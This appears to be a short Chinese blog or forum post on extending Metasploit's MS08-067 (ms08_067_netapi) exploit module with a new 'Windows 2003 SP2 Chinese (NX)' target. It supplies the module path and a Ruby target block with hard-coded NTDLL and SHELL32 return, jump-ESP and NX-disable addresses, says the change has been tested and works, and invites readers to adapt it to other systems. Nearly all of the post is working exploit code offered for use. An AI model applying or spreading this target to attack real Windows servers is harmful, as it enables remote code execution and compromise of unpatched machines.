///在我一次做实验的时候需要用到,但是我一直找不到Chinese的版本的,后来也找到了方法,如下
cd /usr/share/metasploit-framework/modules/exploits/windows/smb
找到ms08_067_netapi.rb文件
在ms08_067_netapi_ser2003_zh.rb中增加以下代码,其实就是修改了四个跳转指针地址(举一反三,其他系统。。。)。
[\'Windows 2003 SP2 Chinese (NX)\',
{
\'RetDec\' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
\'RetPop\' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
\'JmpESP\' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
\'DisableNX\' => 0x7c96f517, # NX disable @NTDLL.DLL
\'Scratch\' => 0x00020408,
}
],
然后msfconsole启动,查看一下就好了
///就是这样子了,我也测试过了,没有问题